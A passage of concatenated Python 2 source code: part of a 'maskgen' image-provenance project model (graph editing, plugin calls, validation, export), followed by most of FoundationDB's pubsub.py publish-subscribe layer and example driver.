image['mask'], openImageFile(os.path.join(self.get_dir(), image['mask']), isMask=False))
for terminal in terminals:
if terminal not in sms:
sms[terminal] = None
return sms
def maskImageName(self):
if self.end is None:
return ''
edge = self.G.get_edge(self.start, self.end)
return edge['maskname'] if 'maskname' in edge else ''
def maskImageFileTime(self):
if self.end is None:
return 0
return self.G.get_edge_image_file_time(self.start, self.end, 'maskname')
def maskImage(self, inputmask=False):
mask = self.G.get_edge_image(self.start, self.end, 'maskname')
if self.end is None or mask is None:
dim = (250, 250) if self.start is None else self.getImage(self.start).size
return ImageWrapper(np.zeros((dim[1], dim[0])).astype('uint8'))
return mask
def maskStats(self):
if self.end is None:
return ''
edge = self.G.get_edge(self.start, self.end)
if edge is None:
return ''
stat_names = ['ssim', 'psnr', 'local psnr', 'local ssim', 'shape change', 'masks count', 'change size category',
'change size ratio']
return ' '.join([key + ': ' + formatStat(value) for key, value in edge.items() if key in stat_names])
def currentImage(self):
if self.end is not None:
return self.getImageAndName(self.end)
elif self.start is not None:
return self.getImageAndName(self.start)
return None, None
def selectNode(self, name):
if self.G.has_node(name):
self.start = name
self.end = None
def selectEdge(self, start, end):
if self.G.has_node(start):
self.start = start
if self.G.has_node(end):
self.end = end
def remove(self, children=False):
import copy
s = self.start
e = self.end
list_to_process= []
if children:
list_to_process = copy.copy(self.G.successors(self.end if self.end is not None else self.start))
def remove_children(children):
for child in children:
remove_children(self.G.successors(child))
self.G.remove(child)
print (child)
self.notify((child, None), 'remove')
remove_children(list_to_process)
""" Remove the selected node or edge """
if (self.start is not None and self.end is not None):
if children:
self.G.remove(self.end, None)
self.labelNodes(self.start)
else:
self.G.remove_edge(self.start, self.end)
self.labelNodes(self.start)
self.labelNodes(self.end)
self.end = None
else:
name = self.start if self.end is None else self.end
p = self.G.predecessors(self.start) if self.end is None else [self.start]
self.G.remove(name, None)
self.start = p[0] if len(p) > 0 else None
self.end = None
for node in p:
self.labelNodes(node)
self.notify((s, e), 'remove')
def getProjectData(self, item, default_value=None):
return self.G.getDataItem(item, default_value=default_value)
def setProjectData(self, item, value, excludeUpdate=False):
"""
:param item:
:param value:
:param excludeUpdate: True if the update does not change the update time stamp on the journal
:return:
"""
self.notify((item,value),'meta')
self.G.setDataItem(item, value, excludeUpdate=excludeUpdate)
def getVersion(self):
""" Return the graph/software versio n"""
return self.G.getVersion()
def isFrozen(self):
return self.G.isFrozen()
def getGraph(self):
"""
:return: underlying graph
@rtype: ImageGraph
"""
return self.G
def validate(self, external=False, status_cb=None):
""" Return the list of errors from all validation rules on the graph.
@rtype: list of ValidationMessage
"""
notifier = self.notify.get_notifier_by_type(notifiers.ValidationNotifier)
if notifier is not None and not notifier.total_errors == None:
return notifier.total_errors
self._executeSkippedComparisons(status_cb=status_cb)
logging.getLogger('maskgen').info('Begin validation for {}'.format(self.getName()))
total_errors = self.validator.run_graph_suite(self.getGraph(), external=external, status_cb=status_cb)
for prop in getProjectProperties():
if prop.mandatory:
item = self.G.getDataItem(prop.name)
if item is None or len(item.strip()) < 3:
total_errors.append(
ValidationMessage(Severity.ERROR,
'',
'',
'Project property ' + prop.description + ' is empty or invalid',
'Mandatory Property',
None))
if notifier is not None:
self.notify.replace(notifiers.ValidationNotifier(total_errors))
return total_errors
def assignColors(self):
level = 1
edgeMap = dict()
foundColors = 0
colors = []
edges = 0
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if edge['op'] == 'Donor':
continue
edges += 1
if 'linkcolor' in edge:
foundColors += 1
colors.append(edge['linkcolor'])
        if edges == foundColors and len(set(colors)) == foundColors:
return
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if edge['op'] == 'Donor':
continue
edgeMap[edge_id] = (level, None)
level = level + 1
redistribute_intensity(edgeMap)
for k, v in edgeMap.iteritems():
self.G.get_edge(k[0], k[1])['linkcolor'] = str(list(v[1])).replace('[', '').replace(']', '').replace(
',', '')
return edgeMap
def __assignLabel(self, node, label):
prior = self.G.get_node(node)['nodetype'] if 'nodetype' in self.G.get_node(node) else None
if prior != label:
self.G.update_node(node, nodetype=label)
self.notify(node, 'label')
def renameFileImages(self):
"""
:return: list of node ids renamed
"""
renamed = []
for node in self.getNodeNames():
self.labelNodes(node)
nodeData = self.G.get_node(node)
if nodeData['nodetype'] in ['final']:
logging.getLogger('maskgen').info('Inspecting {} for rename'.format(nodeData['file']))
suffix = os.path.splitext(nodeData['file'])[1].lower()
file_path_name = os.path.join(self.G.dir, nodeData['file'])
try:
new_file_name = md5_of_file(os.path.join(self.G.dir, nodeData['file'])) + suffix
fullname = os.path.join(self.G.dir, new_file_name)
except:
logging.getLogger('maskgen').error(
'Missing file or invalid permission: {} '.format(nodeData['file']))
continue
if not os.path.exists(fullname):
try:
os.rename(file_path_name, fullname)
renamed.append(node)
logging.getLogger('maskgen').info('Renamed {} to {} '.format(nodeData['file'], new_file_name))
self.G.update_node(node, file=new_file_name)
except Exception as e:
try:
logging.getLogger('maskgen').error(
('Failure to rename file {} : {}. Trying copy').format(file_path_name, str(e)))
shutil.copy2(file_path_name, fullname)
logging.getLogger('maskgen').info(
'Renamed {} to {} '.format(nodeData['file'], new_file_name))
self.G.update_node(node, file=new_file_name)
except:
continue
else:
logging.getLogger('maskgen').warning('New name ' + new_file_name + ' already exists')
self.G.update_node(node, file=new_file_name)
self.save()
return renamed
def labelNodes(self, destination):
baseNodes = []
donorNodes = []
terminalNodes = []
candidateBaseDonorNodes = self._findBaseNodes(destination, excludeDonor=False)
for baseCandidate in candidateBaseDonorNodes:
foundTerminalNodes = self._findTerminalNodes(baseCandidate, excludeDonor=True)
terminalNodes.extend(foundTerminalNodes)
if len(foundTerminalNodes) > 0:
baseNodes.append(baseCandidate)
else:
donorNodes.append(baseCandidate)
for node in donorNodes:
self.__assignLabel(node, 'donor')
for node in baseNodes:
self.__assignLabel(node, 'base')
if len(self.G.successors(destination)) == 0:
if len(self.G.predecessors(destination)) == 0:
self.__assignLabel(destination, 'base')
else:
self.__assignLabel(destination, 'final')
elif len(self.G.predecessors(destination)) > 0:
self.__assignLabel(destination, 'interim')
elif 'nodetype' not in self.G.get_node(destination):
self.__assignLabel(destination, 'base')
def finalNodes(self):
final = []
for name in self.getNodeNames():
node = self.G.get_node(name)
if node['nodetype'] == 'final':
final.append(name)
return final
def baseNodes(self):
bases = []
for name in self.getNodeNames():
node = self.G.get_node(name)
if node['nodetype'] == 'base':
bases.append(name)
return bases
def _findTerminalNodes(self, node, excludeDonor=False, includeOps=None):
terminalsWithOps = self._findTerminalNodesWithCycleDetection(node, visitSet=list(), excludeDonor=excludeDonor)
return [terminalWithOps[0] for terminalWithOps in terminalsWithOps if
includeOps is None or len(set(includeOps).intersection(terminalWithOps[1])) > 0]
def _findTerminalNodesWithCycleDetection(self, node, visitSet=list(), excludeDonor=False):
succs = self.G.successors(node)
if len(succs) == 0:
return [(node, [])]
res = list()
for succ in succs:
if succ in visitSet:
continue
op = self.G.get_edge(node, succ)['op']
if op == 'Donor' and excludeDonor:
continue
visitSet.append(succ)
terminals = self._findTerminalNodesWithCycleDetection(succ,
visitSet=visitSet,
excludeDonor=excludeDonor)
for term in terminals:
term[1].append(op)
res.extend(terminals)
return res
def _findEdgesWithCycleDetection(self, node, excludeDonor=True, visitSet=list()):
preds = self.G.predecessors(node)
res = list()
for pred in preds:
if pred in visitSet:
continue
edge = self.G.get_edge(pred, node)
isNotDonor = (edge['op'] != 'Donor' or not excludeDonor)
if isNotDonor:
visitSet.append(pred)
res.append(EdgeTuple(start=pred, end=node, edge=edge))
res.extend(self._findEdgesWithCycleDetection(pred, excludeDonor=excludeDonor,
visitSet=visitSet) if isNotDonor else list())
return res
def _findBaseNodes(self, node, excludeDonor=True):
return [item[0] for item in mask_rules.findBaseNodesWithCycleDetection(self.G, node, excludeDonor=excludeDonor)]
def _findBaseNodesAndPaths(self, node, excludeDonor=True):
return [(item[0], item[2]) for item in mask_rules.findBaseNodesWithCycleDetection(self.G,node, excludeDonor=excludeDonor)]
def isDonorEdge(self, start, end):
edge = self.G.get_edge(start, end)
if edge is not None:
return edge['op'] == 'Donor'
return False
def getTerminalToBasePairs(self, suffix='.jpg'):
"""
find all pairs of leaf nodes to matching base nodes
:return list of tuples (leaf, base)
@rtype: list of (str,str)
"""
endPointTuples = self.getTerminalAndBaseNodeTuples()
pairs = list()
for endPointTuple in endPointTuples:
matchBaseNodes = [baseNode for baseNode in endPointTuple[1] if
suffix is None or self.G.get_pathname(baseNode).lower().endswith(suffix)]
if len(matchBaseNodes) > 0:
# if more than one base node, use the one that matches the name of the project
projectNodeIndex = matchBaseNodes.index(self.G.get_name()) if self.G.get_name() in matchBaseNodes else 0
baseNode = matchBaseNodes[projectNodeIndex]
startNode = endPointTuple[0]
# perfect match
# if baseNode == self.G.get_name():
# return [(startNode,baseNode)]
pairs.append((startNode, baseNode))
return pairs
def imageFromGroup(self, grp, software=None, **kwargs):
"""
:param grp:
:param software:
:param kwargs:
:return:
@type grp GroupFilter
@type software Software
"""
import copy
pairs_composite = []
resultmsgs = []
kwargs_copy = copy.copy(kwargs)
for filter in grp.filters:
msg, pairs = self.mediaFromPlugin(filter, software=software,
**kwargs_copy)
if msg is not None:
resultmsgs.extend(msg)
if len(pairs) == 0:
break
mod = self.getModificationForEdge(self.start,self.end)
for key,value in mod.arguments.iteritems():
if key not in kwargs_copy or not self.getGraph().isEdgeFilePath('arguments.' + key):
kwargs_copy[key] = value
pairs_composite.extend(pairs)
return resultmsgs, pairs_composite
def canPreviewMask(self):
allowed = self.getStartType() == 'video' or self.getEndType() == 'video'
modification = self.getCurrentEdgeModification()
edge = self.G.get_edge(self.start, self.end)
allowed &= getValue(edge, 'videomasks', None) is not None
op = getOperation(modification.operationName)
compare_func = op.getVideoCompareFunction()
allowed &= video_tools.Previewable(compare_func, modification.arguments)
return 'disabled' if not allowed else 'normal'
def substitutesAllowed(self):
allowed = False
modification = self.getCurrentEdgeModification()
if modification is not None:
allowed = getValue(modification.arguments, 'videoinputmaskname', '')
return 'disabled' if not allowed else 'normal'
def hasSubstituteMasks(self):
edge = self.getGraph().get_edge(self.start, self.end)
subs = getValue(edge, 'substitute videomasks', [])
return len(subs) > 0
def removeSubstituteMasks(self):
if self.hasSubstituteMasks():
edge = self.getGraph().get_edge(self.start, self.end)
edge.pop('substitute videomasks')
def addSubstituteMasks(self, filename):
edge = self.getGraph().get_edge(self.start, self.end)
subs = self.getLinkTool(self.start, self.end).addSubstituteMasks(self.start,
self.end,
self,
edge['op'],
arguments=getValue(edge,'arguments',{}),
filename=filename)
if subs is not None:
for sub in subs:
sub.pop('mask')
edge['substitute videomasks'] = subs
self.getGraph().addEdgeFilePath('substitute videomasks.videosegment','')
self.notify((self.start, self.end), 'update_edge')
return subs is not None
def mediaFromPlugin(self, filter, software=None, passthru=False, description=None, **kwargs):
"""
Use a plugin to create a new media item and link.
This method is given the plugin name, Image, the full pathname of the image and any additional parameters
required by the plugin (name/value pairs).
The name of the resulting image contains the prefix of the input image file name plus an additional numeric index.
If requested by the plugin (return True), the Exif is copied from the input image to the resulting image.
The method resolves the donor parameter's name to the donor's image file name.
If a donor is used, the method creates a Donor link from the donor image to the resulting image node.
If an input mask file is used, the input mask file is moved into the project directory.
Prior to calling the plugin, the output file is created and populated with the contents of the input file for convenience.
The filter plugin must update or overwrite the contents.
The method returns tuple with an error message and a list of pairs (links) added. The error message may be none if no error occurred.
@type filter: str
@type im: ImageWrapper
@type filename: str
@rtype: list of (ValidationMessage, list of (str,str))
"""
im, filename = self.currentImage()
filetype= fileType(filename)
op = plugins.getOperation(filter)
suffix = os.path.splitext(filename)[1].lower()
preferred = plugins.getPreferredSuffix(filter,filetype=filetype)
if type(preferred) == dict:
preferred = preferred[filetype]
fullOp = buildFilterOperation(op)
resolved, donors, graph_args, suffix_override, donorargs = self._resolvePluginValues(kwargs, fullOp)
if suffix_override is not None:
suffix = suffix_override
elif preferred is not None:
if preferred in donors:
suffix = os.path.splitext(resolved[preferred])[1].lower()
else:
suffix = preferred
target = os.path.join(tempfile.gettempdir(), self.G.new_name(self.start, suffix=suffix))
shutil.copy2(filename, target)
try:
msg = None
self.__addEdgeFilePaths(fullOp)
try:
if getValue(kwargs,'$$-pass-thru') or passthru:
extra_args, warning_message = None,None
else:
extra_args, warning_message = plugins.callPlugin(filter, im, filename, target, **resolved)
except Exception as e:
msg = str(e)
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_tb(exc_traceback, limit=10, file=sys.stderr)
logging.getLogger('maskgen').error(
'Plugin {} failed with {} given node {} for arguments {}'.format(filter, str(e),self.start, str(resolved)))
extra_args = None
if msg is not None:
return self._pluginError(filter, msg), []
if extra_args is not None and 'rename_target' in extra_args:
filename = extra_args.pop('rename_target')
newtarget = os.path.join(os.path.split(target)[0], os.path.split(filename)[1])
shutil.copy2(target, newtarget)
target = newtarget
if extra_args is not None and 'override_target' in extra_args:
filename = extra_args.pop('override_target')
target = os.path.join(os.path.split(target)[0], os.path.split(filename)[1])
if extra_args is not None and 'output_files' in extra_args:
file_params = extra_args.pop('output_files')
for name, value in file_params.iteritems():
extra_args[name] = value
self.G.addEdgeFilePath('arguments.' + name, '')
opInfo = self.gopLoader.getOperationWithGroups(op['name'], fake=True)
description = Modification(op['name'], filter + ':' + op['description'] if description is None else description,
category=opInfo.category,
generateMask=opInfo.generateMask,
semanticGroups=graph_args['semanticGroups'] if 'semanticGroups' in graph_args else [],
recordMaskInComposite=opInfo.recordMaskInComposite(filetype) if
'recordMaskInComposite' not in kwargs else kwargs['recordMaskInComposite'])
sendNotifications = kwargs['sendNotifications'] if 'sendNotifications' in kwargs else True
skipRules = kwargs['skipRules'] if 'skipRules' in kwargs else False
if software is None:
software = Software(op['software'], op['version'], internal=True)
if 'recordInCompositeMask' in kwargs:
description.setRecordMaskInComposite(kwargs['recordInCompositeMask'])
experiment_id = kwargs['experiment_id'] if 'experiment_id' in kwargs else None
description.setArguments(
{k: v for k, v in graph_args.iteritems() if k not in ['semanticGroups','sendNotifications', 'skipRules', 'experiment_id']})
if extra_args is not None and type(extra_args) == type({}):
for k, v in extra_args.iteritems():
if k not in kwargs or v is not None:
description.arguments[k] = v
description.setSoftware(software)
description.setAutomated('yes')
edge_parameters = {'plugin_name': filter,'experiment_id': experiment_id}
if 'global operation' in kwargs:
edge_parameters['global operation'] = kwargs['global operation']
results2, status = self.addNextImage(target,
mod=description,
sendNotifications=sendNotifications,
skipRules=skipRules,
position=self._getCurrentPosition((75 if len(donors) > 0 else 0, 75)),
edge_parameters=edge_parameters,
node_parameters={
'experiment_id': experiment_id} if experiment_id is not None else {})
pairs = list()
errors = []
if warning_message is not None:
errors.append(ValidationMessage(Severity.WARNING,
self.start,
self.start,
warning_message,
'Plugin {}'.format(filter),
None))
if results2 is not None:
errors.extend(results2)
finally:
os.remove(target)
if status:
pairs.append((self.start, self.end))
if sendNotifications:
self.notify((self.start, self.end), 'connect')
for donor in donors:
_end = self.end
_start = self.start
self.selectNode(kwargs[donor])
mod = Modification('Donor', '',category='Donor',automated='yes',arguments=donorargs)
self.connect(_end,mod=mod)
pairs.append((kwargs[donor], _end))
self.select((_start, _end))
# donor error message is removed. This annoys me (rwgdrummer).
# really need to classify rules and skip certain categories
errors = removeErrorMessages(errors,lambda msg: 'donor' in msg)
return errors, pairs
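    # Hedged usage sketch (illustration only). The plugin name 'GaussianBlurPlugin' is
    # hypothetical; real names and their arguments come from the installed plugin's
    # operation definition. The call returns validation messages plus the list of
    # (start, end) links that were added, including any donor links.
    #
    #   errors, pairs = model.mediaFromPlugin('GaussianBlurPlugin',
    #                                         sendNotifications=False,
    #                                         skipRules=True)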
def _resolvePluginValues(self, args, operation):
parameters = {}
stripped_args = {}
donors = []
arguments = copy.copy(operation.mandatoryparameters)
arguments.update(operation.optionalparameters)
for k, v in args.iteritems():
if k in arguments or k in {'sendNotifications',
'override_suffix',
'skipRules',
'semanticGroups',
'experiment_id',
'recordInCompositeMask',
'donorargs',
'index'}:
parameters[k] = v
# if arguments[k]['type'] != 'donor':
stripped_args[k] = v
for k, v in args.iteritems():
if k in arguments and \
arguments[k]['type'] == 'donor':
parameters[k] = self.getImageAndName(v)[1]
if parameters[k] is None:
if os.path.exists(v):
parameters[k] = v
else:
logging.getLogger('maskgen').error('Donor {} not found'.format(v))
donors.append(k)
for arg, info in arguments.iteritems():
if arg not in parameters and 'defaultvalue' in info and \
info['defaultvalue'] is not None:
parameters[arg] = info['defaultvalue']
return parameters, donors, stripped_args, \
args['override_suffix'] if 'override_suffix' in args else None, \
getValue(args,'donorargs',{})
def _pluginError(self, filter, msg):
if msg is not None and len(msg) > 0:
return [ValidationMessage(Severity.ERROR,
self.start,
self.start,
'Plugin ' + filter + ': ' + msg,
'Plugin {}'.format(filter),
None)]
return None
def scanNextImageUnConnectedImage(self):
"""Scan for an image node with the same prefix as the currently select image node.
Scan in lexicographic order.
Exlude images that have neighbors.
Return None if a image nodee is not found.
"""
selectionSet = [node for node in self.G.get_nodes() if not self.G.has_neighbors(node) and node != self.start]
selectionSet.sort()
if (len(selectionSet) > 0):
matchNameSet = [name for name in selectionSet if name.startswith(self.start)]
selectionSet = matchNameSet if len(matchNameSet) > 0 else selectionSet
return selectionSet[0] if len(selectionSet) > 0 else None
def scanNextImage(self):
"""
        Scan for a file with the same prefix as the currently selected image node.
        Scan in lexicographic order.
        Exclude image files with names ending in _mask or image files that are already imported.
Return None if a file is not found.
"""
if self.start is None:
return None, None
        # default the prefix to the selected node; a series name, if present, overrides it below
        prefix = self.start
seriesName = self.getSeriesName()
if seriesName is not None:
prefix = seriesName
prefix = prefix[0:32] if len(prefix) > 32 else prefix
files = [self.G.get_node(node)['file'] for node in self.G.get_nodes()]
def filterFunction(file):
return os.path.split(file)[1] not in files and \
not (file.rfind('_mask') > 0) and \
not (file.rfind('_proxy') > 0)
def findFiles(dir, preFix, filterFunction):
set = [os.path.abspath(os.path.join(dir, filename)) for filename in os.listdir(dir) if
(filename.startswith(preFix)) and filterFunction(os.path.abspath(os.path.join(dir, filename)))]
set = sorted(set, key=lambda f: -os.stat(f).st_mtime)
return set
nfile = None
for file in findFiles(self.G.dir, prefix, filterFunction):
nfile = file
break
return self.G.openImage(nfile) if nfile is not None else None, nfile
def getDescriptions(self):
"""
:return: descriptions for all edges
@rtype list of Modification
"""
return [self.getModificationForEdge(edge[0], edge[1]) for edge in
self.G.get_edges()]
def openImage(self, nfile):
"""
:param nfile:
:return:
@rtype: (str, ImageWrapper)
"""
im = None
if nfile is not None and nfile != '':
im = self.G.openImage(nfile)
return nfile, im
def findEdgesByOperationName(self, opName):
return [edge for edge in [self.G.get_edge(edge[0], edge[1]) for edge in self.G.get_edges()]
if edge['op'] == opName]
def getPathExtender(self):
from services.probes import CompositeExtender
"""
:return: Extend the composite or donor through current operation
"""
#nodes = self._findTerminalNodes(self.start, excludeDonor=True)
#if len(nodes) > 0:
return CompositeExtender(self)
#else:
# return DonorExtender(self)
def export(self, location, include=[], redacted=[],notifier=None):
with self.lock:
self.clear_validation_properties()
self.compress(all=True)
path, errors = self.G.create_archive(location, include=include, redacted=redacted, notifier=notifier)
return path, [ValidationMessage(Severity.ERROR,error[0],error[1],error[2],'Export',None) for error in errors]
def export_path(self, location, redacted=[]):
"""
:param location:
:param redacted: a list of registered file paths to exclude @see ImageGraph.addEdgeFilePath
:return:
"""
if self.end is None and self.start is not None:
self.G.create_path_archive(location, self.start, redacted=redacted)
elif self.end is not None:
self.G.create_path_archive(location, self.end, redacted=redacted)
def _getCurrentPosition(self, augment):
if self.start is None:
return (50, 50)
startNode = self.G.get_node(self.start)
return ((startNode['xpos'] if startNode.has_key('xpos') else 50) + augment[0],
(startNode['ypos'] if startNode.has_key('ypos') else 50) + augment[1])
def getModificationForEdge(self, start, end):
"""
:param start:
:param end:
:param edge:
:return: Modification
@type start: str
@type end: str
@rtype: Modification
"""
end_node = self.G.get_node(end)
edge = self.G.get_edge(start, end)
if edge is None:
return None
default_ctime = end_node['ctime'] if 'ctime' in end_node else None
op = self.gopLoader.getOperationWithGroups(edge['op'], warning=True,fake=True)
return Modification(edge['op'],
edge['description'],
start=start,
end=end,
arguments=edge['arguments'] if 'arguments' in edge else {},
inputMaskName=edge['inputmaskname'] if 'inputmaskname' in edge and edge[
'inputmaskname'] and len(edge['inputmaskname']) > 0 else None,
changeMaskName=edge['maskname'] if 'maskname' in edge else None,
software=Software(edge['softwareName'] if 'softwareName' in edge else None,
edge['softwareVersion'] if 'softwareVersion' in edge else None,
'editable' in edge and edge['editable'] == 'no'),
recordMaskInComposite=edge[
'recordMaskInComposite'] if 'recordMaskInComposite' in edge else 'no',
semanticGroups=edge['semanticGroups'] if 'semanticGroups' in edge else None,
automated=edge['automated'] if 'automated' in edge else 'no',
username=edge['username'] if 'username' in edge else '',
ctime=edge['ctime'] if 'ctime' in edge else default_ctime,
errors=edge['errors'] if 'errors' in edge else list(),
maskSet=(VideoMaskSetInfo(edge['videomasks']) if (
'videomasks' in edge and len(edge['videomasks']) > 0) else None),
category=op.category,
generateMask=op.generateMask)
def getSemanticGroups(self, start, end):
edge = self.getGraph().get_edge(start, end)
if edge is not None:
return edge['semanticGroups'] if 'semanticGroups' in edge and edge['semanticGroups'] is not None else []
return []
def setSemanticGroups(self, start, end, grps):
"""
@type start: str
@type end: str
@type grps: list(str)
"""
edge = self.getGraph().get_edge(start, end)
if edge is not None:
self.getGraph().update_edge(start, end, semanticGroups=grps)
self.notify((self.start, self.end), 'update_edge')
def setProjectSummary(self):
groups = []
for edgeTuple in self.getGraph().get_edges():
edge = self.getGraph().get_edge(edgeTuple[0], edgeTuple[1])
semantic_groups = getValue(edge,'semanticGroups',[])
for group in semantic_groups:
if group not in groups:
groups.append(group)
self.setProjectData('semanticgroups', groups)
def set_validation_properties(self, qaState, qaPerson, qaComment, qaData):
import qa_logic
qa_logic.ValidationData(self,qaState,qaPerson,None,qaComment,qaData)
def clear_validation_properties(self):
import qa_logic
logic = qa_logic.ValidationData(self)
logic.clearProperties()
def set_probe_mask_memory(self, memory):
self.probeMaskMemory = memory
"""Not sure if this will ever see any use"""
def get_probe_mask_memory(self):
return self.probeMaskMemory
class VideoMaskSetInfo:
"""
Set of change masks video clips
"""
columnNames = ['Start', 'End', 'Frames', 'File']
func = [float,float,int,str]
columnKeys = ['starttime', 'endtime', 'frames', 'File']
columnValues = {}
def __init__(self, maskset):
self.maskset = maskset
self.columnValues = {'{:=02d}'.format(i):self._convert(maskset[i]) for i in range(len(maskset))}
def _convert(self, item):
return {'Start': self.tofloat(video_tools.get_start_time_from_segment(item)),
'End': self.tofloat(video_tools.get_end_time_from_segment(item)),
'Frames': video_tools.get_frames_from_segment(item),
'File': video_tools.get_file_from_segment(item,default_value='')}
def update(self, item_number, column, value):
video_tools.update_segment(self.maskset[item_number],
**{self.columnKeys[column] : self.func[column](value)})
        # recompute the segment rate as the elapsed time divided by the frame count
        video_tools.update_segment(self.maskset[item_number], rate= \
            (video_tools.get_end_time_from_segment(self.maskset[item_number]) -
             video_tools.get_start_time_from_segment(self.maskset[item_number])) /
            video_tools.get_frames_from_segment(self.maskset[item_number]))
def tofloat(self, o):
return o if o is None else float(o)
|
pubsub.py
|
#
# pubsub.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2018 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""FoundationDB PubSub Layer.
Provides the PubSub class for message passing according to the publish-subscribe
pattern. PubSub methods support operations on:
- Feeds, which publish messages
- Inboxes, which subscribe to feeds and receive messages from them
- Messages
The layer allows management of feeds and inboxes as well as message delivery. An
inbox can subscribe to any number of feeds. The inbox will then receive all
messages posted by each feed to which it subscribes. Subscriptions are
retroactive, so messages posted prior to subscription will become available once
a subscription is established.
"""
import simpledoc
feed_messages = simpledoc.OrderedIndex("messages.?", "fromfeed")
feeds = simpledoc.root.feeds
inboxes = simpledoc.root.inboxes
messages = simpledoc.root.messages
#####################################
# Transactions for SimpleDoc Access #
#####################################
@simpledoc.transactional
def _create_feed(name):
feed = feeds[name]
feed.set_value(name)
return feed
@simpledoc.transactional
def _create_inbox(name):
inbox = inboxes[name]
inbox.set_value(name)
return inbox
@simpledoc.transactional
def _create_feed_and_inbox(name):
feed = _create_feed(name)
inbox = _create_inbox(name)
return feed, inbox
# When creating a subscription, initialize the state of the feed as dirty in
# relation to the inbox as if there have been prior posts by the feed. There may
# in fact have been such posts, but this is the correct initial state regardless.
@simpledoc.transactional
def _create_subscription(inbox, feed):
inbox.subs[feed.get_name()] = ""
inbox.dirtyfeeds[feed.get_name()] = "1"
return True
@simpledoc.transactional
def _post_message(feed, contents):
message = messages.prepend()
message.set_value(contents)
message.fromfeed = feed.get_name()
# Mark the feed as dirty in relation to each watching inbox, setting the
# inbox to copy the feed the next time it gets messages
for inbox in feed.watchinginboxes.get_children():
inboxes[inbox.get_name()].dirtyfeeds[feed.get_name()] = "1"
# Clear all watching inboxes so the feed will not need to touch a subscribed
# inbox upon subsequent posts until the inbox has gotten its messages
feed.watchinginboxes.clear_all()
# Print without other side-effects.
@simpledoc.transactional
def _list_messages(inbox):
print "Messages in {}'s inbox:".format(inbox.get_value())
for feed in inbox.subs.get_children():
print " from {}:".format(feeds[feed.get_name()].get_value())
for message in feed_messages.find_all(feed.get_name()):
print " ", message.get_value()
# Read-only operation without side-effects.
@simpledoc.transactional
def _get_feed_messages(feed, limit):
message_list = []
counter = 0
for message in feed_messages.find_all(feed.get_name()):
if counter == limit:
break
message_list.append(message.get_value())
counter += 1
return message_list
# Read-only operation without side-effects.
@simpledoc.transactional
def _get_inbox_subscriptions(inbox, limit):
subscriptions = []
    for sub in inbox.subs.get_children():
        subscriptions.append(sub.get_name())
return subscriptions
# For each of an inbox's dirty feeds, copy the feed's new messages to the inbox
# and mark the inbox as watching the feed. Then unmark the feeds as dirty.
@simpledoc.transactional
def _copy_dirty_feeds(inbox):
changed = False
latest_id = inbox.latest_message.get_value()
for feed in inbox.dirtyfeeds.get_children():
for message in feed_messages.find_all(feed.get_name()):
            if latest_id is not None and message.get_name() >= latest_id:
break
changed = True
inbox.messages[message.get_name()] = feed.get_name()
feeds[feed.get_name()].watchinginboxes[inbox.get_name()] = "1"
inbox.dirtyfeeds.clear_all()
return changed
# Copy messages from an inbox's dirty feeds and update state accordingly. Return
# the most recent messages up to limit.
@simpledoc.transactional
def _get_inbox_messages(inbox, limit):
inbox_changed = _copy_dirty_feeds(inbox)
message_ids = []
for message in inbox.messages.get_children():
if len(message_ids) >= limit:
break
message_ids.append(message.get_name())
if inbox_changed and len(message_ids) > 0:
inbox.latest_message = message_ids[0]
return [messages[mid].get_value() for mid in message_ids]
@simpledoc.transactional
def _clear_all_messages():
simpledoc.root.clear_all()
@simpledoc.transactional
def _print_feed_stats(feed):
count = len(list(feed_messages.find_all(feed.get_name())))
print "{} messages in feed {}".format(count, feed.get_name())
# Pretty print the entire PubSub database from SimpleDoc
@simpledoc.transactional
def _print_pubsub():
print simpledoc.root.get_json(pretty=True)
################
# PubSub Class #
################
class PubSub(object):
def __init__(self, db):
self.db = db
def create_feed(self, name):
return _create_feed(self.db, name)
def create_inbox(self, name):
return _create_inbox(self.db, name)
def create_inbox_and_feed(self, name):
return _create_feed_and_inbox(self.db, name)
def get_feed_by_name(self, name):
return feeds[name]
def get_inbox_by_name(self, name):
return inboxes[name]
    def create_subscription(self, inbox, feed):
        return _create_subscription(self.db, inbox, feed)
def post_message(self, feed, contents):
return _post_message(self.db, feed, contents)
def list_inbox_messages(self, inbox):
return _list_messages(self.db, inbox)
def get_feed_messages(self, feed, limit=10):
return _get_feed_messages(self.db, feed, limit)
def get_inbox_subscriptions(self, inbox, limit=10):
return _get_inbox_subscriptions(self.db, inbox, limit)
def get_inbox_messages(self, inbox, limit=10):
return _get_inbox_messages(self.db, inbox, limit)
def clear_all_messages(self):
_clear_all_messages(self.db)
def print_feed_stats(self, feed):
_print_feed_stats(self.db, feed)
def print_pubsub(self):
_print_pubsub(self.db)
###################
# PubSub Example #
###################
# This example generates a simple topology with specified numbers of feeds and
# inboxes. Inboxes are randomly subscribed to feeds. Each feed and inbox is then
# run in its own thread. Feeds post a specified number of messages, waiting a
# random interval between messages. Each inbox is polled for messages received,
# terminating when no messages are received for a wait limit.
# Create the specified numbers of feeds and inboxes. Subscribe each inbox to a
# randomly selected subset of feeds.
def setup_topology(feeds, inboxes):
feed_map = {f: ps.create_feed('Alice ' + str(f)) for f in range(feeds)}
inbox_map = {}
for i in range(inboxes):
inbox_map[i] = ps.create_inbox('Bob ' + str(i))
for f in random.sample(xrange(feeds), random.randint(1, feeds)):
ps.create_subscription(inbox_map[i], feed_map[f])
return feed_map, inbox_map
# Post a fixed number of messages, waiting a random interval under 1 sec
# between each message
def feed_driver(feed, messages):
for i in range(messages):
ps.post_message(feed, 'Message {} from {}'.format(i, feed.get_name()))
time.sleep(random.random())
def get_and_print_inbox_messages(inbox, limit=10):
print "\nMessages to {}:".format(inbox.get_name())
for m in ps.get_inbox_messages(inbox, limit):
print " ->", m
# Poll the inbox every 0.1 sec, getting and printing messages received,
# until no messages have been received for 1.1 sec
def inbox_driver(inbox):
wait_limit = 1.1
wait_inc = 0.1
waited = 0.0
changed = False
latest = None
while True:
